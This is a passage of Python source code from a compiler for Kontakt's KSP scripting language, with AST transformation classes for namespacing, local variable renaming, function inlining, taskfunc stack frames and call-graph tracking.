if add_name_prefix:
node.name = self.modify(node.name, parent_function=node, function_params=params, parent_families=parent_families)
# add function to table of available functions
if node.name.identifier in functions and not node.override:
# if this function is overriden
if functions[node.name.identifier].override:
node.lines = [] # clear the lines so we don't accidentally introduce some performance cost by handling these later
else:
raise ksp_ast.ParseException(node, 'Function already declared')
else:
functions[node.name.identifier] = node
# modify the body of the function
node.lines = flatten([self.modify(l, parent_function=node, function_params=params, parent_families=parent_families) for l in node.lines])
return node
def modifyFamilyStmt(self, node, parent_function=None, function_params=None, parent_families=None):
''' First make sure the name of the family is prefixed with the right name space. Then pass this name as context to the further handling of the family body. '''
if parent_families is None:
parent_families = []
# only add namespaces to the outermost family name if multiple ones are nested
if not parent_families:
node.name = self.modify(node.name, parent_function=parent_function, function_params=function_params, parent_families=parent_families)
# add family name to the table of all used families
global_family_name = '.'.join(parent_families + [node.name.identifier])
families.add(global_family_name)
# then modify statements and pass along information to nodes further down the tree of the chain of family definitions so far
node.statements = flatten([self.modify(n, parent_function=parent_function,
function_params=function_params,
parent_families=parent_families + [str(node.name)]) for n in node.statements])
return [node.statements]
def add_global_var(self, global_varname, modifiers):
is_ui_declaration = any([m for m in modifiers if m.startswith('ui_')])
# add variable to list of variables
variables.add(global_varname.lower())
if is_ui_declaration:
ui_variables.add(global_varname.lower())
def handleLocalDeclaration(self, node, func):
''' Handle variable declaration made inside the function node given as parameter.
If the global modifier is not used, create a globally unique name for the local variable and add
info to the name substitution table (locals_name_subst_dict) of the function on how to translate
occurances of the local name to the globally unique one.
Add the globally unique version of the variable to the variables list and extract the declaration line
so that it can later be moved to the init callback '''
# result is by default empty since declaration line will be moved to 'on init'
result = []
# if a global variable declaration made inside a function
is_local = 'local' in node.modifiers
is_global = ('on_init' in func.name.identifier.lower() and not 'local' in node.modifiers) or ('global' in node.modifiers)
if is_global:
global_varname = node.variable.prefix + node.variable.identifier
self.add_global_var(global_varname, node.modifiers)
if 'global' in node.modifiers:
node.modifiers.remove('global')
# if local variable declaration
else:
# if there is an initial value, then add an assignment statement for this (eg. inside a function "declare x := 5" is replaced by "x := 5")
if node.initial_value and not 'const' in node.modifiers and not node.size:
var = node.variable.copy()
# copy also extra attribute added by this class, to make sure that we don't add namespace prefix a second time
if hasattr(node.variable, 'namespace_prefix_done'):
var.namespace_prefix_done = node.variable.namespace_prefix_done
result.append(ksp_ast.AssignStmt(node.lexinfo, ksp_ast.VarRef(node.lexinfo, var), node.initial_value))
# check that the local variable name has not previously been used and add it to the list of locals
local_varname = node.variable.identifier
if local_varname.lower() in func.locals:
raise ksp_ast.ParseException(node.variable, "Local variable redeclared: %s" % local_varname)
func.locals.add(local_varname.lower())
# add info about how to map the local name to the global name so that occurances of the local name can later be modified
if func.is_taskfunc and not 'local' in node.modifiers:
# eg. map x to %p[$sp + 1], where 1 is used for the first local declaration, 2 for the second and so on
var_index = len(func.taskfunc_declaration_statements) + 1
li = node.variable.lexinfo
func.locals_name_subst_dict[local_varname] = ksp_ast.VarRef(node.lexinfo, ksp_ast.ID(node.lexinfo, '%p'),
[ksp_ast.BinOp(li, ksp_ast.VarRef(li, ksp_ast.ID(li, '$fp')), '+', ksp_ast.Integer(li, var_index))])
else:
# eg. map x to $_x
# change name of variable to be a combination of the function name and the declared name (and make sure it's unique)
global_varname = '%s_%s' % (node.variable.prefix, local_varname)
i = 2
while global_varname.lower() in variables:
global_varname = '%s_%s%d' % (node.variable.prefix, local_varname, i)
i += 1
func.locals_name_subst_dict[local_varname] = ksp_ast.VarRef(node.lexinfo, ksp_ast.ID(node.lexinfo, global_varname))
node.variable.prefix, node.variable.identifier = global_varname[0], global_varname[1:]
if 'local' in node.modifiers:
node.modifiers.remove('local')
self.add_global_var(global_varname, node.modifiers)
if is_global:
func.global_declaration_statements.append(node)
elif func.is_taskfunc and not is_local:
func.taskfunc_declaration_statements.append(node)
else:
func.local_declaration_statements.append(node)
return result
def modifyDeclareStmt(self, node, *args, **kwargs):
''' Add a variable prefix ($ or %) to the declaration if not already given.
If declared inside a family then prefix it with the names of the family definitions we're currently inside.
Otherwise prefix the name with the namespaces of the line its declared on (when that line was imported using "import ... as").
Handle the case when the variable is declared inside a user-defined function. '''
# default handling of everything except the variable name:
node.size = self.modify(node.size, *args, **kwargs)
if type(node.initial_value) is list:
node.initial_value = [self.modify(v, *args, **kwargs) for v in node.initial_value]
elif node.initial_value:
node.initial_value = self.modify(node.initial_value, *args, **kwargs)
node.parameters = [self.modify(p, *args, **kwargs) for p in node.parameters]
# if variable was declared inside a family, prefix it with the namespaces given by the chain of nested families it's declared inside
if kwargs['parent_families']:
node.variable = prefix_ID_with_ns(node.variable, kwargs['parent_families'], kwargs['function_params'], force_prefixing=True)
# otherwise treat it as any other name
else:
node.variable = self.modifyID(node.variable, kwargs['parent_function'], kwargs['parent_families'], is_name_in_declaration=True)
# if no variable prefix used, add one automatically
if not node.variable.prefix:
if node.size is not None:
node.variable.prefix = '%'
else:
node.variable.prefix = '$'
# is this declaration made inside of a function?
if kwargs['parent_function']:
lines = self.handleLocalDeclaration(node, kwargs['parent_function'])
lines = flatten([self.modify(n, *args, **kwargs) for n in lines])
return lines
else:
vname = node.variable.prefix + node.variable.identifier.lower()
self.add_global_var(vname, node.modifiers)
return [node]
def modifyVarRef(self, node, parent_function=None, function_params=None, parent_families=None, is_name_in_declaration=False):
''' Translate any references to local variables to their real name '''
# Note 1: previously this could all be handled in modifyID, but since the taskfunc system introduced VarRef objects with subscripts
# we now need to handle it here since if you replace eg. x by %p[$sp + 1] the subscript need to be included in the resulting node.
# Note 2: not all identifiers have a parent VarRef so some replacements are also taken care of in the modifyID routine (see below).
if parent_function and node.identifier.identifier in parent_function.locals_name_subst_dict:
new_node = parent_function.locals_name_subst_dict[node.identifier.identifier]
if node.subscripts and isinstance(new_node, ksp_ast.VarRef): # combine subscripts
subscripts = [self.modify(s, parent_function, function_params, parent_families, is_name_in_declaration)
for s in node.subscripts + new_node.subscripts]
new_node = ksp_ast.VarRef(new_node.lexinfo, new_node.identifier, subscripts)
return new_node
return super(ASTModifierFixReferencesAndFamilies, self).modifyVarRef(node, parent_function, function_params, parent_families, is_name_in_declaration)
def modifyID(self, node, parent_function=None, function_params=None, parent_families=None, is_name_in_declaration=False):
''' Add namespace prefix and translate references to local variables to their globally unique counterpart as determined by the translation table of the function '''
# look up the line object from the first macro preprocessor phase in order to extract information about the namespace
namespaces = self.line_map[node.lineno].namespaces
# make sure to not add namespace twice
if hasattr(node, 'namespace_prefix_done'):
#raise ksp_ast.ParseException(node, 'this one already has a namespace: ' + unicode(node))
id = node
else:
id = prefix_ID_with_ns(node, namespaces, function_params, force_prefixing=is_name_in_declaration)
# if this is a local variable name, then replace it with the corresponding global name
# most of these are handled by modifyVarRef, but here we catch some other cases like for example declaration statements (where the identifier isn't a varref)
if parent_function and id.identifier in parent_function.locals_name_subst_dict:
id = parent_function.locals_name_subst_dict[id.identifier].identifier
#id = ksp_ast.ID(node.lexinfo, parent_function.locals_name_subst_dict[id.identifier])
# mark node to avoid that we add namespace twice
id.namespace_prefix_done = True
return id
class ASTModifierFixPrefixes(ASTModifierBase):
def __init__(self, ast):
ASTModifierBase.__init__(self, modify_expressions=True)
self.traverse(ast)
def modifyFunctionDef(self, node, parent_function=None, parent_varref=None):
return ASTModifierBase.modifyFunctionDef(self, node, parent_function=node) # pass along a reference to what function we're currently inside
def modifyVarRef(self, node, parent_function=None, parent_varref=None):
return ASTModifierBase.modifyVarRef(self, node, parent_function=parent_function, parent_varref=node) # pass along a reference to what varref we're currently inside
def modifyID(self, node, parent_function=None, parent_varref=None):
''' Add a variable prefix (one of $, %, @, !, ? and ~) to each variable based on the list of variables previously built '''
name = node.prefix + node.identifier
first_part = name.split('.')[0]
# if prefix is missing and this is not a function or family and does not start with a function parameter (eg. if a parameter is passed as param and then referenced as param__member)
if node.prefix == '' and not (name in functions or
name in ksp_builtins.functions or
name in families or
name in properties or
(parent_function and (first_part in parent_function.parameters or
parent_function.return_value and first_part == parent_function.return_value.identifier))):
possible_prefixes = [prefix for prefix in '$%@!?~'
if prefix + name.lower() in variables or prefix + name in ksp_builtins.variables]
# if there is a subscript then only array types are possible
if parent_varref and parent_varref.subscripts:
possible_prefixes = [p for p in possible_prefixes if p not in '$@~']
if len(possible_prefixes) == 0:
raise ksp_ast.ParseException(node, "%s has not been declared!" % name)
if len(possible_prefixes) > 1:
raise ksp_ast.ParseException(node, "Type of %s ambigious (variable prefix could be any of: %s)" % (name, ', '.join(possible_prefixes)))
node.prefix = possible_prefixes[0]
return node
elif node.prefix and not (name.lower() in variables or name in ksp_builtins.variables):
raise ksp_ast.ParseException(node, "%s has not been declared." % name)
else:
return node
class ASTModifierFixPrefixesIncludingLocalVars(ASTModifierFixPrefixes):
def __init__(self, ast):
ASTModifierFixPrefixes.__init__(self, ast)
def modifyFunctionDef(self, node, parent_function=None):
# pass along a reference to what function we're currently inside
node = ASTModifierBase.modifyFunctionDef(self, node, parent_function=node)
# extracted local/global variable declarations won't be handled automatically, so modify them explicitly here
node.local_declaration_statements = flatten([self.modify(n, parent_function=node) for n in node.local_declaration_statements])
node.global_declaration_statements = flatten([self.modify(n, parent_function=node) for n in node.global_declaration_statements])
# TODO: check if we need to handle this one too:
#node.taskfunc_declaration_statements = flatten([self.modify(n, parent_function=node) for n in node.taskfunc_declaration_statements])
return node
class ASTModifierIDSubstituter(ASTModifierBase):
'''Class for replacing whole names with new names, eg. replace all "$x" by "$y" and all "$loop_counter" by "$plsd" (in case variable names are compacted).
If there is an "x" to "y" substitution and it sees the name x.z, then it will NOT be translated into y.z. Only whole names are changed.
'''
def __init__(self, name_subst_dict, force_lower_case=False):
self.name_subst_dict = name_subst_dict
self.force_lower_case = force_lower_case
ASTModifierBase.__init__(self, modify_expressions=True)
def modifyID(self, node, *args, **kwargs):
''' Translate identifiers according to the translation table '''
lookup_key = node.prefix + node.identifier
if self.force_lower_case:
lookup_key = lookup_key.lower()
if lookup_key in self.name_subst_dict:
new_identifier = self.name_subst_dict[lookup_key]
if type(new_identifier) in (str, str):
return ksp_ast.ID(node.lexinfo, new_identifier)
else:
raise ksp_ast.ParseException(node, "Internal error when replacing variables. Expected a string to replace with.")
else:
return node
class ASTModifierVarRefSubstituter(ASTModifierBase):
'''Class for replacing certain variables references with an expression, eg. replace all "param" by "$y+1".
If there is an "x" to "y" substitution and it sees the name x.z, then this will (unlike if ASTModifierIDSubstituter had been used) be translated into y.z.
'''
def __init__(self, name_subst_dict, inlining_function_node=None, subscript_addition=False):
self.name_subst_dict = name_subst_dict
self.inlining_function_node = inlining_function_node
self.subscript_addition = subscript_addition
ASTModifierBase.__init__(self, modify_expressions=True)
def modify(self, node, *args, **kwargs):
''' if a reference to a parent function that is being inlined should be added, then add it to the result (each statement of the result in case it's a list) '''
result = ASTModifierBase.modify(self, node, *args, **kwargs)
if not (self.inlining_function_node is None):
if result is None:
pass
elif type(result) is list:
for stmt in result:
stmt.lexinfo[2].append(self.inlining_function_node)
else:
result.lexinfo[2].append(self.inlining_function_node)
return result
def modifyVarRef(self, node, *args, **kwargs):
if node.identifier.identifier_first_part in self.name_subst_dict:
new_expr = self.name_subst_dict[node.identifier.identifier_first_part]
if isinstance(new_expr, ksp_ast.VarRef):
if self.subscript_addition:
# figure out which subscript to use or add if there are two
if not new_expr.subscripts and not node.subscripts:
subscripts = []
elif len(new_expr.subscripts) == 1 and not node.subscripts:
subscripts = [self.modify(s, *args, **kwargs) for s in new_expr.subscripts]
elif not new_expr.subscripts and len(node.subscript) == 1:
subscripts = [self.modify(s, *args, **kwargs) for s in node.subscripts]
elif len(new_expr.subscripts) == 1 and len(node.subscripts) == 1:
subscripts = [ksp_ast.BinOp(node.lexinfo, new_expr.subscripts[0], '+', node.subscripts[0])]
#else:
# raise ksp_ast.ParseException(node, 'Double subscript not allowed: %s' % unicode(node))
else:
subscripts = [self.modify(s, *args, **kwargs) for s in node.subscripts] + new_expr.subscripts
# build a new VarRef where the first part of the identifier has been replaced by the new_expr name.
return ksp_ast.VarRef(new_expr.lexinfo,
ksp_ast.ID(new_expr.identifier.lexinfo, new_expr.identifier.prefix + new_expr.identifier.identifier + node.identifier.identifier_last_part),
subscripts=subscripts)
else:
return new_expr
else:
return ASTModifierBase.modifyVarRef(self, node, *args, **kwargs)
def modifyFunctionDef(self, node, *args, **kwargs):
# don't modify the function name ID (replacing it with an expression is not the right thing to do...)
# modify everything else (the lines in the body)
node.lines = flatten([self.modify(l, *args, **kwargs) for l in node.lines])
return node
def modifyFunctionCall(self, node, *args, **kwargs):
''' Check if the function name in a function call is a parameter and substitute its name if that's the case '''
func_call = node
if node.function_name.identifier_first_part in self.name_subst_dict:
# fetch the replacement expression and ensure that it's a variable reference
new_expr = self.name_subst_dict[node.function_name.identifier_first_part]
if not isinstance(new_expr, ksp_ast.VarRef):
raise ksp_ast.ParseException(node, 'Expected a function name parameter')
# create a new FunctionCall object with the substituted function name
function_name = ksp_ast.ID(new_expr.identifier.lexinfo, new_expr.identifier.identifier + node.function_name.identifier_last_part)
func_call = ksp_ast.FunctionCall(new_expr.lexinfo, function_name, node.parameters, node.is_procedure, node.using_call_keyword)
return ASTModifierBase.modifyFunctionCall(self, func_call, *args, **kwargs)
def modifyID(self, node, *args, **kwargs):
''' Translate identifiers according to the translation table (used for inlining functions, see ASTModifierFunctionExpander) '''
if node.identifier_first_part in self.name_subst_dict:
raise Exception('here although we expected not to be, ID=%s, %s' % (node.identifier, self.name_subst_dict))
new_expr = self.name_subst_dict[node.identifier]
if type(new_expr) in (str, str):
new_expr = ksp_ast.ID(node.lexinfo, new_expr)
else:
raise Exception('error')
return new_expr
else:
return node
class ASTModifierNameFixer(ASTModifierBase):
def __init__(self, ast):
ASTModifierBase.__init__(self, modify_expressions=True)
self.traverse(ast)
def replace_dots_in_name(self, name):
''' Replaces . by __ in name'''
return name.replace('.', '__')
def modifyID(self, node, *args, **kwargs):
orig = node.identifier
x = self.replace_dots_in_name(node.identifier)
if '.' in node.identifier:
node.identifier = node.identifier.replace('.', '__')
return node
class ASTModifierFunctionExpander(ASTModifierBase):
def __init__(self, ast):
ASTModifierBase.__init__(self, modify_expressions=True)
self.traverse(ast, parent_toplevel=None, function_stack=[])
def modifyModule(self, node, *args, **kwargs):
''' Add init callback if it is not already available and move it to the top (before all other functions and callbacks) '''
# find and extract 'on init' block
on_init_block = None
for b in node.blocks:
if isinstance(b, ksp_ast.Callback) and b.name == 'init':
node.blocks.remove(b)
on_init_block = b
break
# if there was none, create one
if on_init_block is None:
on_init_block = ksp_ast.Callback(node.lexinfo, 'init', lines=[])
# insert it as the first block
node.blocks.insert(0, on_init_block)
return ASTModifierBase.modifyModule(self, node, *args, **kwargs)
def modifyFunctionDef(self, node, parent_toplevel=None, function_stack=None):
''' Add to context info about which function/callback we are currently inside '''
# only functions without parameters/return vaue can be invoked using 'call'
# those are the only ones where we need to modify the original function definition
# (in the other cases the recursive inlining handles everything)
if (node.parameters or node.return_value) and not node.is_taskfunc:
return node
else:
return ASTModifierBase.modifyFunctionDef(self, node, parent_toplevel=node, function_stack=function_stack)
def modifyCallback(self, node, parent_toplevel=None, function_stack=None):
''' Add to context info about which function/callback we are currently inside '''
return ASTModifierBase.modifyCallback(self, node, parent_toplevel=node, function_stack=function_stack)
def convert_property_access_to_function_call(self, node):
''' Convert a property reference like myprop to a function call like myprop.get() '''
assert(isinstance(node, ksp_ast.VarRef))
func_name = '%s.get' % node.identifier.identifier
if func_name not in functions:
raise ksp_ast.ParseException(node, 'The property %s has no get-function and can therefore not be written to.' % str(node.identifier.identifier))
get_function = functions[func_name]
# if there is a subscript, pass it as a parameter to the get function
parameters = node.subscripts[:]
return ksp_ast.FunctionCall(node.lexinfo, get_function.name, parameters, is_procedure=False)
def modifyVarRef(self, node, *args, **kwargs):
''' If the varref is a property, then convert it to a call to the get-function of the property '''
if node.identifier.identifier in properties:
return self.modifyFunctionCall(self.convert_property_access_to_function_call(node),
*args, **kwargs)
else:
return ASTModifierBase.modifyVarRef(self, node, *args, **kwargs)
def modifyAssignStmt(self, node, parent_toplevel=None, function_stack=None, disallow_function_in_rhs=False):
''' If it's an assignment of the type "x := myfunc(...)" then pass the left hand side of the assignment ("x" in this case)
as a parameter to the function call handler. This effectively passes the lhs as a parameter to the function and replaces
the whole assignment by the inlined function body. This allows myfunc to be a multi-line function.
Please note that this only applies if the function call is the only thing on the right hand side.
In the case of for example "x := myfunc(...) + 1" the inlining of the function is handled in the context of
an expression handler and in that context only functions whose body consists of a single assignment are allowed (the right
hand side expression of that assignment is then what gets inlined into the expression. '''
if not isinstance(node.varref, ksp_ast.VarRef):
raise ksp_ast.ParseException(node, 'The left hand side of the assignment needs to be a variable reference.')
# if this is a property assignment, eg. myproperty := 5, convert it to a function call, eg. myproperty.set(5)
if node.varref.identifier.identifier in properties:
func_name = '%s.set' % node.varref.identifier.identifier
if func_name not in functions:
raise ksp_ast.ParseException(node.varref, 'The property %s has no set-function and is therefore read-only.' % str(node.varref.identifier.identifier))
set_function = functions[func_name]
parameters = node.varref.subscripts + [node.expression]
function_call = ksp_ast.FunctionCall(node.lexinfo, set_function.name, parameters, is_procedure=True)
return self.modifyFunctionCall(function_call,
parent_toplevel=parent_toplevel,
function_stack=function_stack)
expression = node.expression
# if the right-hand-side is a property access, convert it to a function call to the get-function of the property
if isinstance(expression, ksp_ast.VarRef) and expression.identifier.identifier in properties:
expression = self.convert_property_access_to_function_call(node.expression)
# if the right-hand-side is function call
if isinstance(expression, ksp_ast.FunctionCall) and expression.function_name.identifier not in ksp_builtins.functions and not disallow_function_in_rhs:
# invocations of built-in functions are not checked at this compilation stage
return self.modifyFunctionCall(expression,
parent_toplevel=parent_toplevel,
function_stack=function_stack,
assign_stmt_lhs=node.varref)
else:
return ASTModifierBase.modifyAssignStmt(self, node, parent_toplevel=parent_toplevel, function_stack=function_stack)
def doFunctionCallChecks(self, node, function_name, func, is_inside_init_callback, function_stack, assign_stmt_lhs):
''' Make various checks that a function call is correct (eg. function exists, parameters match, not recursive, invoked from a valid context).
Factorered out from the modifyFunctionCall method in order to make the logic there easier to follow '''
# verify that function exists
if func is None:
raise ksp_ast.ParseException(node, "Unknown function: %s" % function_name)
# verify that it's not a recursive call
if function_name in function_stack:
raise ksp_ast.ParseException(node, "Recursive functions calls (functions directly or indirectly calling themselves) not allowed: %s" % ' -> '.join(function_stack + [function_name]))
# verify that number of parameters and arguments matches
if len(node.parameters) != len(func.parameters):
raise ksp_ast.ParseException(node, "Wrong number of parameters to %s. Expected %d, got %d." % (function_name, len(func.parameters), len(node.parameters)))
# verify that function calls that are part of expressions invoke a function for which a return value variable has been defined
if not node.is_procedure and func.return_value is None:
raise ksp_ast.ParseException(node, "Function %s does not return any value and cannot be used in this context" % function_name)
# verify that function is not used within some expression, unless it's a taskfunc function and it's the single thing on the right-hand side of an assignment
if not node.is_procedure and func.is_taskfunc and assign_stmt_lhs is None:
raise ksp_ast.ParseException(node, 'When used inside an expression like this the function call needs to be the only thing on the right hand side of an assignment, eg. x := call myfunc().')
# verify that 'call' is not used from within 'on init'
if is_inside_init_callback and (node.using_call_keyword or func.is_taskfunc):
raise ksp_ast.ParseException(node, 'Usage of "call" inside init callback is not allowed (please also verify that the function is not a taskfunc).')
if node.using_call_keyword:
# verify that there are no parameters (unless it's a taskfunc function call)
if not func.is_taskfunc and node.parameters:
raise ksp_ast.ParseException(node, "Parameters for function invokations using 'call' not supported by Kontakt")
# verify that 'call' is not used within some expression (eg. as in the incorrect "x := call myfunc")
if not node.is_procedure and not func.is_taskfunc:
raise ksp_ast.ParseException(node, 'Using "call" inside an expression is not allowed for non-taskfunc functions. "call" needs to be the first word of the line.')
if func.is_taskfunc:
raise ksp_ast.ParseException(node, 'A taskfunc function cannot be invoked using the "call" keyword')
def updateCallGraph(self, node, parent_toplevel=None, function_stack=None):
''' This function takes a function call as parameter node and updates the call graph accordingly '''
if isinstance(parent_toplevel, ksp_ast.FunctionDef):
parent_function_name = parent_toplevel.name.identifier
else:
parent_function_name = None # if called from within a callback represent the callback as None in the call graph (since it's not really relevant from which callback)
function_name = node.function_name.identifier
if function_name not in ksp_builtins.functions: # and not (isinstance(parent_toplevel, ksp_ast.FunctionCall) and function_name in parent_toplevel.locals_name_subst_dict):
if function_name not in functions:
raise ksp_ast.ParseException(node.function_name, "Unknown function: %s" % function_name)
call_graph[parent_function_name].append(function_name) # enter a link from the caller to the callee in the call graph
call_graph[function_name] = call_graph[function_name] # add target node if it doesn't already exist
if node.using_call_keyword:
called_functions.add(function_name)
def getTaskFuncCallPrologueAndEpilogue(self, node, func, assign_stmt_lhs):
# if the function call is of the format "x := myfunc(...)" then treat it like myfunc(..., x), i.e. insert the left hand side of the assignment as the last parameter
if assign_stmt_lhs:
parameters = node.parameters + [assign_stmt_lhs]
else:
parameters = node.parameters
prologue = []
epilogue = []
for i, param in enumerate(parameters):
idx = len(parameters)-i
if func.parameter_types[i] not in ('out', 'ref'):
li = param.lexinfo
p_ref = ksp_ast.VarRef(li, ksp_ast.ID(li, '%p'),
[ksp_ast.BinOp(li, ksp_ast.VarRef(li, ksp_ast.ID(li, '$sp')), '-', ksp_ast.Integer(li, idx))])
prologue.append(ksp_ast.AssignStmt(li, p_ref, param))
if isinstance(param, ksp_ast.VarRef) and func.parameter_types[i] in ('out', 'var'):
li = param.lexinfo
p_ref = ksp_ast.VarRef(li, ksp_ast.ID(li, '%p'),
[ksp_ast.BinOp(li, ksp_ast.VarRef(li, ksp_ast.ID(li, '$sp')), '-', ksp_ast.Integer(li, idx))])
epilogue.append(ksp_ast.AssignStmt(li, param, p_ref))
return (prologue, epilogue)
def modifyFunctionCall(self, node, parent_toplevel=None, function_stack=None, assign_stmt_lhs=None):
''' For invokations of user-defined functions check that the function is defined and that the number of parameters match.
Unless "call" is used inline the function '''
function_name = node.function_name.identifier # shorter name alias
# update call graph
self.updateCallGraph(node, parent_toplevel, function_stack)
# invocations of built-in functions are not checked at this compilation stage
if function_name in ksp_builtins.functions and not node.using_call_keyword:
if function_name == 'wait' and isinstance(parent_toplevel, ksp_ast.FunctionDef):
functions_invoking_wait.add(parent_toplevel.name.identifier)
return ASTModifierBase.modifyFunctionCall(self, node, parent_toplevel=parent_toplevel, function_stack=function_stack, assign_stmt_lhs=assign_stmt_lhs)
# get a reference to the function node and run error checks
func = functions.get(function_name, None)
is_inside_init_callback = isinstance(parent_toplevel, ksp_ast.Callback) and parent_toplevel.name == 'init'
self.doFunctionCallChecks(node, function_name, func, is_inside_init_callback, function_stack, assign_stmt_lhs)
# if function invoked from within a callback, mark it as used
if isinstance(parent_toplevel, ksp_ast.Callback):
functions[function_name].used = True
# if it's a call to a taskfunc function
if func.is_taskfunc:
(prologue, epilogue) = self.getTaskFuncCallPrologueAndEpilogue(node, func, assign_stmt_lhs)
prologue = flatten([self.modifyAssignStmt(stmt, parent_toplevel, function_stack, disallow_function_in_rhs=True) for stmt in prologue])
epilogue = flatten([self.modifyAssignStmt(stmt, parent_toplevel, function_stack, disallow_function_in_rhs=True) for stmt in epilogue])
result = prologue + [node] + epilogue
node.parameters = []
node.using_call_keyword = True
node.is_procedure = True
called_functions.add(node.function_name.identifier)
# if 'call' keyword is used
elif node.using_call_keyword:
result = [node]
# else if we're inlining the function start out with an empty result since the line of invocation itself will be replaced
else:
result = []
if is_inside_init_callback:
# inline any declarations made inside the body of the invoked function (afterwards clear the lists so that they don't get inlined twice)
result = func.global_declaration_statements + func.local_declaration_statements + result
func.local_declaration_statements = []
func.global_declaration_statements = []
# build a substitution dictionary that maps parameters to arguments
name_subst_dict = dict(list(zip(list(map(str, func.parameters)), node.parameters)))
# if the function call is of the format "x := myfunc(...)", then setup the dict up to substitute the result variable of the function by "x"
if assign_stmt_lhs:
name_subst_dict[str(func.return_value)] = assign_stmt_lhs
# also add the mapping from local variable names to their new globally unique counterpart
name_subst_dict.update(func.locals_name_subst_dict)
# apply name substitutions to a copy of the function
func = ASTModifierVarRefSubstituter(name_subst_dict, inlining_function_node=node).modify(func.copy())
# recursively modify each line in the function body and add them to the return value
result = result + flatten([self.modify(line, parent_toplevel=parent_toplevel, function_stack=function_stack + [function_name]) for line in func.lines])
# if this function call is embedded within some expression
if not (assign_stmt_lhs or node.is_procedure):
# if the inlined function body consists of just a single statement on the format: result := <expr> where 'result' is the result variable of the function
if len(result) == 1 and isinstance(result[0], ksp_ast.AssignStmt) and result[0].varref.identifier.identifier == func.return_value.identifier:
return result[0].expression # return the right-hand side of that single assignment
else:
raise ksp_ast.ParseException(node, 'The definition of function %s needs to consist of a single line (eg. "result := <expr>") in order to be used in this context' % function_name)
return result
class ASTModifierTaskfuncFunctionHandler(ASTModifierBase):
def __init__(self, ast):
ASTModifierBase.__init__(self, modify_expressions=False)
self.traverse(ast, parent_taskfunc_function=None)
def modifyCallback(self, node, *args, **kwargs):
return node
def modifyFunctionDef(self, node, parent_taskfunc_function=None, assign_stmt_lhs=None):
''' Add to context info about which taskfunc function we are currently inside '''
ID, BinOp, Integer, VarRef, AssignStmt, FunctionCall = ksp_ast.ID, ksp_ast.BinOp, ksp_ast.Integer, ksp_ast.VarRef, ksp_ast.AssignStmt, ksp_ast.FunctionCall
if not node.is_taskfunc:
return node
if node.return_value:
params = node.parameters + [node.return_value]
else:
params = node.parameters
# build a substitution dictionary that maps parameters to arguments
name_subst_dict = {}
li = node.lexinfo
for i, param in enumerate(params):
frame_offset = i + len(node.taskfunc_declaration_statements) + 1
# replace locally declared 'x' with '%p[$fp + <var_index>'
p_ref = VarRef(li, ID(li, '%p'), [BinOp(li, VarRef(li, ID(li, '$fp')), '+', Integer(li, frame_offset))])
name_subst_dict[str(param)] = p_ref
# apply name substitutions to a copy of the function
func = ASTModifierVarRefSubstituter(name_subst_dict, subscript_addition=False).modify(node)
# add prolog
Pxmax = len(params)
Txmax = len(node.taskfunc_declaration_statements)
Ta = Pxmax + Txmax + 1
line0 = AssignStmt(li, VarRef(li, ID(li, '%p'), [BinOp(li, VarRef(li, ID(li, '$sp')), '-', Integer(li, Ta))]), VarRef(li, ID(li, '$fp')))
line1 = AssignStmt(li, VarRef(li, ID(li, '$fp')), BinOp(li, VarRef(li, ID(li, '$sp')), '-', Integer(li, Ta)))
line2 = AssignStmt(li, VarRef(li, ID(li, '$sp')), VarRef(li, ID(li, '$fp')))
#line2 = AssignStmt(li, VarRef(li, ID(li, '$sp')), BinOp(li, VarRef(li, ID(li, '$fp')), '-', Integer(li, Txmax)))
node.lines.insert(0, line0)
node.lines.insert(1, line1)
node.lines.insert(2, line2)
if 'TCM_DEBUG' in true_conditions:
line3 = FunctionCall(li, function_name=ID(li, 'check_full'), parameters=[], is_procedure=True, using_call_keyword=True)
node.lines.insert(3, line3)
call_graph[node.name.identifier].append('check_full')
called_functions.add('check_full')
# epilogue
line0 = AssignStmt(li, VarRef(li, ID(li, '$sp')), VarRef(li, ID(li, '$fp')))
line1 = AssignStmt(li, VarRef(li, ID(li, '$fp')), VarRef(li, ID(li, '%p'), [VarRef(li, ID(li, '$fp'))]))
line2 = AssignStmt(li, VarRef(li, ID(li, '$sp')), BinOp(li, VarRef(li, ID(li, '$sp')), '+', Integer(li, Ta)))
#line3 = AssignStmt(li, VarRef(li, ID(li, '%tstate.ues'), [VarRef(li, ID(li, '$tx'))]), VarRef(li, ID(li, '$sp')))
node.lines.append(line0)
node.lines.append(line1)
node.lines.append(line2)
node.parameters = []
return func
class ASTModifierFixPrefixesAndFixControlPars(ASTModifierFixPrefixes):
def __init__(self, ast):
ASTModifierFixPrefixes.__init__(self, ast)
def modifyVarRef(self, node, *args, **kwargs):
''' Check that there is not more than one subscript '''
if len(node.subscripts) > 1:
raise ksp_ast.ParseException(node.subscripts[0], 'Too many variable subscripts: %s. A normal array variable can have at most one.' % str(node))
return ASTModifierFixPrefixes.modifyVarRef(self, node, *args, **kwargs)
def modifyFunctionCall(self, node, *args, **kwargs):
result = ASTModifierFixPrefixes.modifyFunctionCall(self, node, *args, **kwargs)
if node.is_procedure:
node = result[0]
else:
node = result
function_name = node.function_name.identifier # shorter name alias
# if it's a builtin function that sets or gets a control par and the first parameter is not an integer ID, but rather a UI variable
if function_name in ksp_builtins.functions and not node.using_call_keyword and \
(function_name.startswith('set_control_par') or function_name.startswith('get_control_par')) and \
len(node.parameters) > 0 and isinstance(node.parameters[0], ksp_ast.VarRef) and str(node.parameters[0].identifier).lower() in ui_variables:
# then wrap the UI variable in a get_ui_id call, eg. myknob is converted into get_ui_id(myknob)
func_call_inner = ksp_ast.FunctionCall(node.lexinfo, ksp_ast.ID(node.parameters[0].lexinfo, 'get_ui_id'), [node.parameters[0]], is_procedure=False)
node = ksp_ast.FunctionCall(node.lexinfo, node.function_name, [func_call_inner] + node.parameters[1:], is_procedure=node.is_procedure)
if node.is_procedure:
return [node]
else:
return node
def mark_used_functions_using_depth_first_traversal(call_graph, start_node=None, visited=None):
''' Make a depth-first traversal of call graph and set the used attribute of functions invoked directly or indirectly from some callback.
The graph is represented by a dictionary where graph[f1] == f1 means that the function with name f1 calls the function with name f2 (the names are strings).'''
if visited is None:
visited = set()
nodes_to_visit = set()
if start_node is None:
nodes_to_visit = set(call_graph[None]) # None represents the source of a normal callback (a callback invoking a function as opposed to a function invoking a function)
else:
if start_node not in visited:
functions[start_node].used = True
visited.add(start_node)
nodes_to_visit = set([x for x in call_graph[start_node] if x is not None])
for n in nodes_to_visit:
mark_used_functions_using_depth_first_traversal(call_graph, n, visited)
def find_node(start_node, search_node, visited=None, path=None):
if visited is None:
visited = []
path = []
visited.append(start_node)
path = path + [start_node]
if start_node == search_node:
return path
for n in start_node.get_childnodes():
